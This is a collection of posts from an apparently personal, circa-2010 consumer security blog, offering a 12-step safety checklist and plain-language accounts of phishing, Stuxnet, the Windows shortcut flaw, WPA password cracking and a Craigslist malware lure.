I Gotcher Security/Privacy Checklist for 2011 Right Here, Pal

Another year, another cou-ple dollars, another couple or three or six hundred serious security flaws in Windows/MacOS X/*nix/Adobe Reader/Adobe Flash/Photoshop/Microsoft Office/Internet Explorer/Safari/Firefox/JavaScript/etc/etc that have been (and in many cases, still are) leveraged by the crooks to separate you from your money and personal/private information.

With the roller coaster ride known as 2010 winding down, I thought I'd summarize many of the things I've posted about thus far in a "yearly review" item - let's call it the 2011 12-Step Internet Security and Privacy Checklist:

1. STOP USING IE. Assuming you're a Windows user - surely you're not still using Internet Explorer as your default browser? (Mac-o-philes need not smirk here - I will predict that Safari will become more and more targeted by the criminal world; you have been warned.) I suggest Firefox + the NoScript plugin, or possibly Google Chrome + its NotScript plugin - although I have far less experience with Chrome so I can't unequivocally recommend it.

2. STAY UPDATED. No matter what your operating system is, make sure it's always got the latest updates. Windows can be configured to automatically download and install priority updates, or just download them and let you know that they're ready. I suggest at least the latter. The same goes for whatever browser(s) you use. (Chrome doesn't give you a choice - it updates itself transparently whenever a new version is published.)

3. FIX YER ACROBAT/READER SOFTWARE. If you use Adobe Acrobat or Adobe Reader to view .pdf files, (a) update to the latest "X" version, and then immediately do this:

• open Edit > Preferences
• in the JavaScript part, turn off "Enable Acrobat JavaScript"
• in the Trust Manager part, turn off "Allow opening of non-PDF file attachments with external applications"

If you're running version 9 and don't want to update to version X*, please do still do the above steps.

Adobe continues to doggedly leave these things turned on by default in each new version of Acrobat and Reader, which is just plain irresponsible on their part.

* that link points at an installer that doesn't require you to first load the !@#$% Adobe Download Manager. Just say NO to ADM.

4. Another thing about Acrobat and Reader - there are alternatives. I have tried FoxIt a couple times but the rendering quality is noticeably poorer than what Adobe does. More recently I've started using the Google Docs Viewer for reading PDF files in Firefox (it works in all of the other browsers as far as I know).

5. WEAR PROTECTION. For Windows users - now that Microsoft has its free MS Security Essentials anti-malware software available, there is no excuse to not be running some kind of antivirus/antimalware protection. I will go further and say that I personally see no reason to pay anyone for this kind of functionality - e.g. Symantec, McAfee, etc. By all accounts MS does a very good job with MSSE.

6. CONNECT SECURELY. There is another nice utility plugin for Firefox called HTTPSEverywhere. If you do financial stuff on-line, you might've noticed that your browser's address bar will (hopefully) say something like "https://www.yourbank.com" when you're logged into the financial site... The "s" in "https" means "secure". Many other non-financial sites support the https protocol, as well as the usual "http" protocol.

Here's what HTTPSEverywhere does for the sites it knows about, that can support https connections: It will force you to connect with https rather than http. At the moment the list includes Facebook, Google Search, Twitter, Meebo, NY Times, Washington Post, bit.ly, Hotmail, Microsoft, Wikipedia, Wordpress.com, Google APIs, and quite a few others. When you are connected via https your connection cannot be snooped, which is very nice if you're connected to the 'net using an open wifi hotspot that does not provide a Virtual Private Network connection to the Internet.. In general you always want "https" if it's available, no matter what you're doing.

7. BE SELFISH. Turn off any unnecessary "network shares" on all of your computers.

8. USE PASSWORDS. Make sure every machine on your network is login password-protected.

9. MASSAGE YOUR ROUTER. Make sure your router (or modem/router - i.e. the box that you got from your cable or phone company that hooks you up to the internet) is properly configured.

Typically the router configuration is accessed through a mini-web server that is built into the router - and typically it will have an address of something like 192.168.1.1.

In that particular case, you can go to your browser and type in "http://192.168.1.1" and the web interface will show up. (Other addresses are possible; consult the router or router/modem manual for more details about your particular box.) Here are some things to keep in mind:

• Change the default administrative password for the router. E.g. for Linksys routers, all of the ones I've used have a default password of "admin". If you don't do anything else, do this.
• Make sure that you're using at least WPA encryption if your router has wi-fi capability. WPA2 is better, WEP is sorta kinda better than nothing, but not much. IMO the wireless interface of a router is its weakest link in terms of people getting onto your network and possibly stealing private (e.g. financial) information from other computers connected to your network.
  
• turn off anything that says "Plug and Play".
• Make sure the NAT firewall is enabled. It might just say "Firewall".
• Don't have any more ports (holes) opened in your firewall than absolutely necessary. If you open one or more up and then stop using whatever program needs them open, close them.
  

10. USE "LASTPASS". I continue to love this free, secure, backed-up-in-the-cloud password and private data manager product. I won't go into it here since I already did that not too long ago.


11. BACK UP YER STUFF. This is a huge topic, and I won't go into detail, but - do you have at least two, recent backup copies of all of the stuff on your computer(s)/mobile devices that you can't live without? E.g. photos, financial data files, the latest version of the Great Novel that you're working on, critical account information for on-line resources that you use (LastPass can help here), address book/contact database, etc. I say two backups because many people would tell you that if you only have one copy "somewhere", you're not really backed up. You need to have two copies of all of the important stuff, ideally on different kinds of media (DVD-R, CD-R, CD-RW, USB memory stick, cloud backup....), and certainly not in the same location - i.e. carry one of the copies in your car or keep one at your mom's house or something.

12. DONT EVER CLICK ON A LINK IN AN EMAIL. E.g. if you get a notice that seems to be from Microsoft or Adobe or whoever (whomever?) that you need to update something, don't click on the link that is provided. Instead, navigate to the vendor's website in your browser and find the update - if it actually exists - yourself. You might even try googling it - e.g. "acrobat x update".

OK, that's your twelve steps. I'm sure I left something important out - there are so many things to worry about when you're toodling around the World Wide Web - but any and all of these things will help at least a little bit in keeping you and yours safer in the new year to come.

Firefox Saves the Day

I just got to see a new feature in Firefox 3 at work, and it's pretty cool.

I had an email in my GMail spam folder that looked like this:


Looks pretty legit, right? The link text appears OK. However, the actual link looks something like (part of the URL intentionally deleted):

http://smtp.cremadescalvosotelo.com/bankofamerica=JSPR53/e-online-banking...

So obviously it's at best a personal information phishing site. Well, I decided to see where that would take me, so I clicked on it. However, Firefox saved me from myself:


Clicking on the "Why was this page blocked?" button shows this:

I tried this in Internet Explorer and I'm happy (and a bit surprised) to report that it gave a similar "you really don't want to go there" message.

However, even though our browsers sometimes try to protect us from ourselves, links in emails should never be clicked on. If you get a message from your bank that wants you to log in for whatever reason, go to your browser and type in the URL that you know to be the correct one for your bank (if you don't have it bookmarked) rather than click on anything in an email.

Stuxnet Worm - still in the news

I have posted three times about the Microsoft Windows "Shortcut (LNK)" vulnerability since July. A lot has transpired since then; it's been found to be one of six security issues in Windows that are leveraged by the Stuxnet worm (some of which were previously unknown in the security community).

Stuxnet is in the press right now as being one of the most serious security threats ever unleashed, and is said to be a sort of "new animal" in cyber-warfare. I'll provide some links for further reading below, but the apparent intent and sophisticated behavior of Stuxnet is so, well, awesome (in a bad way) that I do want to summarize what's been learned:

• Its targeted behavior is very specific - although it propagates via Windows (using USB memory sticks and/or network connections), its ultimate target is a particular brand of industrial controller computer made by Siemens, that are network-connected to those Windows systems
• Not only is it Seimens "SCADA"-system specific, but its end target are "variable-frequency drives" made by two specific companies, that regulate the speed and operation of electric motors
• Only motors that are programmed to run within a specific speed band are targeted
• The speed band corresponds to speeds used by uranium refinement centrifuges
• The end result is that Stuxnet causes those motors to periodically overspeed and underspeed

It's still not known who wrote Stuxnet, but there is universal agreement that its sophistication and complexity are unprecedented, and unfortunately is probably the first shot fired in a new level of cyber-warfare.

As promised, here are some links if you want to dig deeper:

• Wired Magazine article
• Stuxnet Wikipedia entry
• Symantec dossier on Stuxnet (very technical)
• very recent news about a possible 2nd "payload" in Stuxnet

I promise we have not heard the end of this "worm".

"Shall we play a game?"

WPA Wireless Password Cracking For Fun & Profit

Many of my friends and family have heard or read my whinings about how using WEP encryption for your wireless network is a short hair away from "extremely stupid", and that you should really be using WPA (or better, WPA2). Well, I am hoping that the message has gotten through to most folks, although I must say that when I do a site survey around my neighborhood even now, I still see the occasional WEP-"protected" hotspot pop up.

But you, being smarter than the average bear, are now sitting behind a WPA-protected router at home or in your office - life is good! Welllll... maybe not. What kind of passkey did you lock it down with? Please tell me it's not your dog's name, or maybe favorite gourmet dish, or your Mom's maiden name... Is it?

The reason why I ask is this: there is at least one company out there that offers a WPA password-cracking service, for $17 a crack. Apparently it takes 40 minutes or less if your password is in their 135 million word "dictionary".

All that's required is to provide them with a "sniff" file of a wireless network that is to be infiltrated. This sniff (.pcap) file can be easily created using a laptop with a wireless card and open-source software such as aircrack-ng (even I've done it, purely in the interest of research and learning of course - and I did it using my own wireless router as the target).

Now you may be saying, "but Igor, who is going to go to the trouble of trying to hack into my network?" That's a good question, but IMO the wireless part of any network is potentially its weakest link, so why not lock it down as best you can so you don't have to worry about it?

That means you need a decent password. I won't say "excellent" or even "very good" password - you probably don't want to use the kind of gobbledegookeley password that LastPass can generate, because you might want to give some (highly) trusted person access to your wireless network. So you want a password that can be verbally relayed to someone without too much difficulty.

Remember that the kind of WPA cracking we're talking about depends on a dictionary. Even a dictionary that has 135 million words in it is not going to have bizarre combinations of words and letters (let alone punctuation marks). So how could you create a Bizarre Combination? One suggestion is to use some kind of easily rememberable number followed by a string of easily rememberable words - yet numbers and words that are not blatantly obvious to everyone that knows you. I'll throw this out:

the first address number you lived at that you remember +

high school name +

favorite gradeschool teacher

So in my case (and no I don't use this password anywhere) it would be

648ravenswoodhackworth

Now that's a pretty good password. Throwing in some punctuation and capitalization, e.g.

648.Ravenswood.Hackworth

makes it far more unlikely (I would submit, impossible) for any dictionary to have that particular sequence in it. Easy Cheesy! And pretty easy to remember as well.

Heck, write it down on a piece of paper and put it in your desk drawer - if the miscreant who's trying to break into your network has physical access to your desk drawer, you have far bigger problems that I'll attempt to address here!

Escaping Password Hell with "LastPass"

There are two or three people out there that recognize the importance of using robust passwords for important on-line resources like banks and PayPal and eBay and such (as well as using different passwords for each site). Most everyone else uses their dog's or first born child's name for every single thing they have to log into on the net... Because it's really hard to remember passwords that are robust, such as E5A@/6Z(aKj&^]RO+V. So in the end most people don't even try.

Admittedly, I was somewhat lax about robust passwords too, until recently - I had one password that I used for casual sites, and a much longer one that involved a combination of numbers and characters for my financial sites. But still, I used that one password at a lot of different places.

Via episode #256 of the Security Now podcast, I've become aware of the free LastPass product, and am now using it for all of my password needs. Here, I'll try to summarize what it does and hopefully how easy it is to use, in the hopes that you'll take the time to start using it too.

Firstly - before we continue - here's what LastPass supports: Windows, Mac OS X, Linux, Firefox, Safari, Chrome, and even Internet Explorer 8^) . So most people will be able to use this cool utility.

OK - onwards... The thing I like most about LastPass (which I'll call "LP" from here on out) is that all of my passwords are stored in encrypted form "in the cloud". This lets me access them from any browser that I have the LP plugin installed on, so I can be anywhere in the world. Since the encryption is done "locally" - i.e. on my computer rather than by the LP site, they are extremely well protected. Not even the LP people have any way of getting my passwords unless I tell them my Master Password. When I need to use a password, LP goes up to my cloud-stored Password Vault, grabs the encrypted password, sucks it down the Internet Pipes, decrypts it, and fills in the password field on a web page.

But - there is a caveat: you will need to have one robust Master Password - it's the "key to the kingdom" of all of the rest of your passwords. It really needs to be "strong" and you really really need to be able to remember it. And - your dog's name or mother's maiden name ain't gonna cut it. (A place to start is - combine the home phone number that you had when you were a kid with the names of your three best friends in high school - e.g. 3042732273JamesFredHomer is a pretty good password.)

Once LP is installed (it automatically installed into both Firefox and IE for me) you can get started. I was able to import all of my passwords from the previous password vault utility that I used (Roboform ToGo), which was nice (it can also import from IE's and Firefox's password caches, as well as a bunch of other password products). Once that was done, I could go to my Password Vault in my browser:

From there I can combine my passwords into Groups (e.g. "Shopping", "Travel", etc.), edit them, delete them, and even Share them (securely) with another LP user. Also, just by clicking on a site name, it will bring that site up and fill in your credentials. For new sites, LP will offer to remember the username and password for each one.

But what I did right after installation is use LastPass's built-in password generator to create new passwords for all of the financial sites that I use. Since different sites have different requirements for passwords - and on the flip side, limitations to what characters/numbers/etc. they can understand - the LastPass generator can be easily configured:

Every time "Generate" is pressed, it will generate a fresh password based on what you have setup for length and contents... The green bar gives you an idea of how secure each new password is.

LP can guide you through the process of replacing your old, crummy, too-short passwords that you've used for the last ten years with much more secure ones that it generates. And the beauty is that you don't have to remember any of them - when you next visit any of the sites that are stored in LP, it will automatically fill in the username and password fields (and it can even press the "login" button for you if you want).

One other significant feature is that LP can fill out most web pages that want your name, phone number, credit card, credit card expiration date, credit card CVV number, ship-to address, bill-to address, etc. You can enter that stuff into LP once; from that point on it will fill in all of those fields for you. And, like the contents of the Password Vault, all of that information is encrypted and safe.

So I mentioned at the outset that LP is free, and everything that I've described (and quite a bit more that I won't go into, lest this become even more of a novel-length post) is free. There are, however, some additional features that are only in the Premium version. One of them is the ability to download and install the LP applet for the iPhone/iPad/iPod Touch, BlackBerry, Android, and Windows Mobile devices so that you can always keep your entire Vault with you. Several other Premium features are there too, as described here. Now comes the bad news - it's gonna cost you... drum roll please... a buck a month. Howsa! I'm trying to think of something else that costs a buck a month... Nope, can't.

But if you don't need any of the Premium stuff, all you have to lose by trying LastPass is the time it takes to install it and learn it, and I encourage you to give it a shot.

Finally: a friend of ours was recently "hacked" on-line and was conned out of a few hundred dollars. She was pretty freaked out about it... I asked her what kind of password she was using. You guessed it, the names of her dogs. I told her about LastPass and was going to help her get it installed and running, but she was able to get it going on her own without any assistance (other than my suggesting ways to create an easy-to-remember Master Password). So I think that's a good testimonial that it's pretty straightforward to use.

Microsoft releases "out of cycle" patch for Shortcut Flaw

Hopefully you've already heard about this because you're Paying Attention, but just in cast you haven't: Microsoft released a fix yesterday (Monday) for the shortcut/LNK vulnerability that has been in the news over the couple weeks. I strongly recommend that you get your Windows system(s) patched with this fix. I have patched my WinXP and Win7 systems with no issues, and have subsequently removed the workarounds that I had in place.

Go to MS's Security Bulletin MS10-046 and select your version of Windows from the table there; that will take you to a download/instruction page - or alternatively, run Windows Update, which should get it for you automatically. You will probably have to reboot your system afterwards (I had to for both XP and Win7).

Update: Microsoft has released a fairly technical Q&A for this fix - good reading for those that want to dig into the details.

Check Writing Robots Attack Earth

The annual Black Hat conference is underway in Las Vegas... This is "the" event where security researchers try to out-do one another in discovering and exploiting security flaws... One of the more interesting ones this time around involves hacking ATM machines, but what I wanted to share is a diagram that shows the complexity and ingenuity of a check-forging scheme that originates in Mother Russia:
For the full story go check out the CNet article... It continues to amaze me how quickly the sophistication of cyber-criminals is increasing!

Update on MS Shortcut Flaw

Details and corrections about how this vulnerability works and the seriousness of it continue to come out in the infosec world. Episode 258 of the Security Now! podcast lays it out pretty well. Some key points:

• Microsoft has updated their Security Advisory at least twice this week; it now points to a Knowledge Base article that has a "Fix it" thing you can click on to make the two changes I described in the last post about this. They have also substantially revised their analysis of the flaw - originally it was thought that the AutoPlay/Autorun feature had to be turned on but as we know now, just viewing a shortcut in Windows Explorer can trigger malware if it exists.
  
• It is apparently possible that even shortcuts embedded in documents (e.g. MS Word files), emails, or web pages could be used as vectors... Think about that for moment - yow!
• The SN podcast also points to a Didier Stevens blog post that describes how to use Software Restriction Policies in Windows to combat the flaw. However, it's probably a more advanced "hack" than the ones already described, and you can really screw stuff up if you don't know what you're doing with Policies. I have managed to configure two systems I have (one XP, one Win7) successfully with these changes, and tested it on one of them by trying to run an executable on a thumb drive that I have mounted... The application is blocked and a message comes up saying so.
  

The big question is how and when Microsoft will fix this. But - no matter what they do - older versions of Windows (e.g. Windows 2000 and XP SP2) are no longer being updated by MS with patches, so unless they make an exception for this very serious flaw, some systems will never be safe from this (unless a 3rd party makes some kind of widget available that blocks it).

Friday 7/30 update: MS has announced that they'e going to release an out-of-cycle patch next week for this. Details are in the MS Security blog.

New Windows vulnerability discovered - be careful with those USB sticks!

Microsoft posted information late last week about a vulnerability in Windows, that can mean that merely loading a USB memory stick onto your PC can cause bad things to happen. Basically, if the file that contains the little picture (icon) that shows up in Windows Explorer is "infected", it can cause whatever bad code that the attackers have attached to the icon file to be executed. At that point your system is pwnd 8^) and they can do whatever they want to it.

At the moment there is no fix and the workarounds are fairly technical. More information and details can be found at The H Security page as well as Microsoft's Security Advisory about it. So until MS releases a patch, be extremely careful about loading USB memory sticks onto your PC or laptop - know where they came from. Don't take candy or USB drives from strangers!

7/19 update: SANS has raised their Infocon Alert level to Yellow just because of the Shortcut bug.

7/20 update: This flaw has gotten more press than anything I remember seeing since the Conficker worm, which happened shortly after I started this blog. Furthermore, more than one industry expert is saying that this flaw is not easily fixable... I've been doing some more research on it, and despite first deciding that I would not make any modifications to my machines to protect against it, just a while ago I changed my mind and made the two mods recommended by Microsoft to my Windows 7 work laptop. One of the mods is to delete a Windows registry key (after making a backup of it), which will suppress the display of icons on shortcuts in Windows Explorer (thus precluding running malicious code that might be embedded in the icon file).


The other is to disable (and stop, if it's already running) a Windows "service" called WebClient, using the services.msc application. (In all likelihood you do not need this service running, unless you utilize the "WebDAV Client Service", which has to do with the interoperability of web page authoring tools. Or something like that.)

As I said before these mods are not the sort of thing that most people do often or even at all with their Windows installations, but if you follow the instructions carefully in the Microsoft Security Advisory, you should be fine. As long as you make the backup of the registry key as described in that document, both actions are reversible, and I therefore recommend doing them.

Urgent - possible Craigslist malware alert

I just came across something that looks very questionable, and am sufficiently alarmed about it that I am making this post without doing my normal research first. I have not heard about this particular malware distribution approach before, and I very nearly did a bad bad thing just a few minutes ago (i.e. allowing an unknown executable to download and run).

The story: I posted a number of things on Craigslist today, two of which were guitar amplifiers. I received two responses within minutes of each other, on those amps, from two completely different email addresses - one being a Hotmail account, and the other a Live account. Both have the exact same message body:

"Will you trade for this?"

In each email, that "question" was followed by a URL (which I am not publishing for obvious reasons). I clicked on the links, which have the form "www.hostsimages.info/" (followed by alphanumeric values), and both took me to the same final URL, which looks like this:


It's hard to see in the image, but the page looks like it has some images that it wants to load, but can't for some reason. Also, Firefox has posted a message in the yellow banner bar that says:

This website needs to install the following add-on: 'Flash Image Loader' from 'AdobeFlash'. Please download the Flash Image Loader by clicking here...

Now, I've never heard of "Flash Image Loader" but it sounds legitimate enough - what I didn't notice until later is that it is supposedly sourced by a company called "AdobeFlash". Hmmmm. Fortunately before clicking on the yellow bar, which would've downloaded a file, I looked at Firefox's status bar while hovering my mouse cursor over that message, and the actual download URL shown is "images201.com/imagex.exe". I have no idea what that executable is, but it sure isn't from Adobe and could literally be anything. (Googling "imagex.exe" comes up with a few things, but none of them have anything to do with Flash or Adobe.)

In sum, what seems to be happening here is that some people up to no good are (either manually, or more probably by using automation) monitoring Craigslist postings, and responding with an email that has been cleverly constructed to lead people to a malicious site that downloads an executable on their machines.

So - I think I dodged a bullet here. What is quite ironic is that on a recent episode of my favorite security podcast Security Now, Steve Gibson declared that he never ever clicks on links that he gets via email. I remember chuckling to myself when I heard that, because I do it all the time and haven't had anything bad happen - hey, I'm a smart guy that sees this stuff coming! Well, I learned a lesson today for sure.

Finally: speaking of "Security Now", Steve has a post up on his blog about a recently discovered Adobe Flash exploit that everyone - yes even you Mac types (and Linux types...) needs to know about and take the appropriate steps for. Acrobat and (Acrobat) Reader are also affected, and the bad guys are already taking advantage of it. You can read about that here.

Do you have a spare $447,000 laying around?

Today's topic is not new news - the incident happened last July - but I've thought about it many times since hearing about it. This makes me ever more paranoid about doing any financial transactions online... I still do them just because it's so dang convenient, but I wonder how long the model that's in place (authenticated "secure" browser sessions) can continue to work.

Full details can be found in a Technology Review article, but the gist of this is that a construction company in Mountain View, California was liberated of $447K from its commercial bank account, while one of its employees was signed in to it.

You might think "oh someone got his password" - but the company had implemented what everyone thought was the Safe And Secure thing to do: the account was set up to not only require a normal password, but also a second, "one time" password that is generated by a small electronic device or card that the person logging in has to have in his or her physical possession (I have one that I use with my PayPal account).

Unfortunately, his system had been infected with a malware program that basically waited for him to sign into the commercial account, and then while he was signed in, perform transactions in the background to withdraw and transfer the loot to several Bad Guy Accounts.

So - what to do? I'm going to sound like one of those magical round plastic disc things that everyone used to have, that had music on them (I think they were called "phonograph records") - I've said most of this before... But I feel reasonably secure in doing these things on my systems:

• keeping antivirus software updated (I'm now using Microsoft's new and free Security Essentials on almost all of my PCs)
• making sure the web browser is up-to-date
  
• disabling scripting (JavaScript and ActiveX) in the browser. I use NoScript in Firefox, which lets me selectively enable or disable scripts on a per-site basis
• keeping browser plugins and standalone programs such as Adobe Acrobat and Flash updated
• using a one-time password device on all financial accounts that support it, in order to have the magic that's called Dual Factor Authentication. Paypal and eBay, as well as many other banks/institutions support these, and sometimes a device that is obtained from one place can be used elsewhere - for instance, the Verisign device that I got from PayPal is supported by my credit union

I'll close by saying that I think some of my friends roll their eyes when I start yammering about these things - all I'll say is, "don't come cryin' to me when something very bad happens because you weren't taking precautions."

Hmmm, I think my Dad told me that, a long time ago.

GSM Phone Security - Not So Secure Anymore

Happy new year to everyone! Really. I would like to think it will be better than that last one!

This has been in the press recently: Although it's not trivial to do - a snoop needs about $1000 worth of equipment to accomplish it - but the security scheme that digital cell phones use - "GSM" - has been cracked. This means if you're an AT&T (don't get me started about that company!) or T-Mobile subscriber in the US, your calls can no longer be considered to be private. (Verizon, Sprint, etc. use CDMA technology, which is totally different than GSM.)

The researcher that published the technique is being lambasted quite a bit for doing it, but I believe his intentions are noble - as is so often the case in big business, companies are loathe to do anything that costs them money and prefer to ignore Elephants In The Living Room until they're forced to do something.

Now, another blogger asserts that there's nothing to worry about, and that the phone companies will move to the stronger 128-bit encryption protocol (the current protocol is "only" 64 bit) - but it could be said that the publication of the decryption technique will at least hurry them along a bit, and even with that, who knows when this will actually be 100% deployed across the country?

***

While we're on the subject - the cordless landline phones I use in my home are Panasonic "DECT 6.0" phones - I got them at Costco, but DECT 6.0 phones are sold "everywhere". In theory my phones provide secured communications that can't be monitored, but I have seen mention here and there that some phone manufacturers don't enable the encryption that DECT provides. So when I order a pizza (mmmmm, Fast Pizza Delivery pizza!) over the phone and give them my credit card information, I really have no idea whether that conversation could be monitored by some crook with a sophisticated radio receiver (e.g. GNU Radio).

So for the moment, since I'm stuck with AT&T Wireless for the time being, and because I use DECT 6.0 phones at home, I have no assurance that my conversations are secure. You might say "well who cares - I have nothing to hide!" - well, how many times do you use your cell or home wireless phone to perform financial transactions with your bank, broker, credit card company,...?